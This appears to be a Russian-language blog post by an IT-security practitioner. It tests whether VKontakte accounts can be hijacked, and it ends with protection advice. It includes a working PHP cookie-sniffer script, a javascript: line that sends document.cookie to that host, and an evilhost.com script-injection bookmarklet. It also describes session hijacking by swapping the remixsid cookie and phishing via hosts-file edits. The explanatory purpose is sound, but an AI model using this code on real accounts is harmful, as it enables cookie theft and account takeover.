Взлом страницы вконтакте, правда или вымисел?


Легко ли взломать страницу вконтакте?

Достаточно часто на просторах рунета, можно встретить объявления типа: Взломаю любой аккаунт социальной сети, взмылю мыло по шустрому. ;)

Взлом страницы вконтакте

Взлом страницы вконтакте

Да и так, как одна из моих профессий тесно связана  с IT безопасностью, сегодня я решил немного эту тему по развивать.  А именно протестировать возможность взлома страницы вконтакте, посредством подмены параметров файлов cookies. Специально для этих целей я зарегистрировал два аккаунта vk.соm, естественно вошел в них на разных компах, и сохранил куки.

В качестве клиентской ОС использовал горячо любимый мною Linux, вторая страница была открыта в Opera (на ОС Windows XP) так, как только этот интернет браузер имеет возможность изменять параметры cookies. В качестве Web сервера использовал LAMP. Весь тест проводился в локальной сети, с выходом в интернет через прокси сервер. На веб сервере, я по быстрому набросал и разместил PHP скрипт (сниффер), который принимал клиентские куки, вот такого содержания:

<?php

//читаем кукисы из адресной строки
$cookie = $_SERVER['REQUEST_URI'];

//фиксируем ip (на всякий случай:)
$ip = $_SERVER['REMOTE_ADDR'];

//создаем и открываем на запись файл snif.dat
$file = fopen("snif.dat","a+");

//вычисляем текущее время
$time = date("H:i:M:d");

//добавляем в строковую переменную куки + время + ip
$add_text = "$ip $time $cookie";

//записываем данные в файл
fputs($file,$add_text.",\r\n");

//закрываем файл
fclose($file);

//делаем редирект куда-нибудь:)
header('Location: http://master-it.biz');

?>

Сниффер принимающий кукисы готов, а передавал я их с помощью JavaScript, вбив в адресную строку:

javascript:window.location.href = "http://testing/sniff.php?cookie="+document.cookie;

Я не стал полностью автоматизировать работу клиента, т. к. это уже выходит за рамки моих морально-этических представлений, ибо любой остро желающий может разработать его самостоятельно.

DOM Based XSS и vzlom vkontakte

Вариантов для кражи cookie может быть достаточно много, например использование DOM-Based XSS уязвимостей клиентских приложений vkontakte.

Следующей задачей для меня была подмена уведенных куков. И это оказалось вообще проще простого. Открыв браузер Опера => Настройки => Общие настройки => Расширенные => Cookies

Opera Cookies

Opera Cookies

Я изменил только значение параметра куков remixsid и сразу же вошел в другой аккаунт :)

Но стоило мне сменить ip адрес, как передо мной во весь экран на рисовалась балалайка (старая такая: добрая, русская) ;)

Тогда я тупо скопировал всю папку C:\Users\Master-It\AppData\Roaming\Opera\Opera\ авторизовавшись уже в Windows 7, инициируя действия трояна, и опять сменил ip адрес, потом заменил содержимое папок Opera, и опять вошел в (чужой) аккаунт!

И какой из всего этого напрашивается вывод?

Да очень простой! Взлом аккаунта очень мало вероятен, если вы переходите по ссылке на какой-то [сомнительный] сторонний ресурс, но зато он будет возможен при переходе на фейковую страницу. И для этого злоумышленник, как правило использует социальную инженерию. Т. е. находит метод при котором вы самостоятельно сливаете ему свои данные от страниц социальных сетей.

С vk.com не прокатывают  Brute Force Attack   с использованием утилит жесткого перебора паролей. Ибо после неудачной 3-5 попытки включается капча.

В качестве альтернативы могут выступать вирусы трояны, которые просто воруют пользовательские данные [пачками] пакетами, и отправляют их своим разработчикам (клиентам).

И уж точно, я бы не стал использовать для этих целей какие-то сторонние утилиты, ибо тема бесплатного сыра кажется мне уже давно избитой, и пользы от него несоизмеримо меньше нежели вреда. Ведь бот нет расширяется с каждым днем в арифметической прогрессии. ;)

Trojan.Hosts.xxx и модификация локального hosts

Локальный файл hosts отвечает за сопоставление  DNS записей ip адресам. Более того, его сопоставление является наиболее приоритетным, перед указанными DNS серверами в настройках сетевых интерфейсов.

Но особое внимание хочется обратить на отображение урла в браузере, ибо при измененном hosts происходит необходимый редирект в соответствии с указанными инструкциями, а урл остается сохраненный.

Говоря простым языком, если вы откроете свою страницу вконтакте из закладок браузера, то в урле будет строка vk.com в то время, как hosts перекинет вас на сайт злоумышленника и свои данные авторизации (логин и пароль) вы будете вводить именно там!

При условии точно созданной странички, отличить разницу визуально практически не возможно. Проверить реальность доменного имени, можно вбив самостоятельно в урле vkontakte.ru, или открыв контакт из поиска.

Взлом ВКонтакте (vk.com)  и социальная инженерия

Сейчас я приведу пример эксплуатации социальной инженерии, для взлома аккаунта vk.com.

Многие знают, что в популярной соц. сети имеется огромная база медиа файлов, около 1000 ТБ, но это собственно и не соль, а вот именно соль заключается в том, что многие хотят скачать музыку из соц. сети  вконтакте , и находят для этих целей соответствующие скрипты.

Самый банальный скрипт, который незаметно для пользователя, уведет его файлы куки, может выглядеть так:

javascript:var sc=document.createElement(‘script’);sc.src=’http://evilhost.com/scripts/evilscript.js?nz=’+Math.random();document.body.appendChild(s);void(0);

Естественно, пользователь сам его вставляет в адресную строку браузера, и активирует. Самое интересное, что после этого он еще и скачивает музыку, в то время, как злоумышленник анализирует его файлы cookies. ;)

Как защитить свой аккаунт вконтакте от взлома?

Вопрос конечно больше риторический, но все же  варианты для защиты странички vkontakte от взлома, есть:

1. Не сохранять Cookies и прочие пользовательские данные на жесткий диск.

2. Использовать хороший антивирус + файрвол.

3. Прежде чем нажать на ссылку, смотреть куда она ведет.

4. Во избежание ввода данных на фейковой странице, внимательно смотреть Url в адресной строке браузера. Однако, если вы открываете свою страницу вк из закладок, а в системе изменен файл hosts, то вы будете переброшены на фейковую страницу, при этом url в адресной строке будет без изменений vk.com.

5. Никогда не светить свою реальную почту, которая связана с чем бы то ни было.

6. Не хранить логины и пароли в не зашифрованном виде на локальном компьютере, например в текстовом файле.

7. Создавать сложные пароли с использованием цифр и букв в верхнем и нижнем регистре, а также добавлять спец. символы.

8. Никогда не переходить по почтовым ссылкам. Злоумышленник может с легкостью подделать адрес отправителя почты с помощью PHP скрипта.

9. Правильное использование (UAC) политики контроля учетных записей Windows Vista, 7, 8, 10. Должен быть выбран самый строгий параметр, который будет уведомлять при попытках вирусов установить программное обеспечение или внести изменения в системные файлы, такие, как hosts. Модифицированный hosts делает все сам на много упрощает взлом vkontakte,  т. к. вообще исключает необходимость перехода по ссылке на фейк.

P.S. Ну и конечно же периодически создавать контрольные точки восстановления Windows. Ну это так, на всякий случай! :)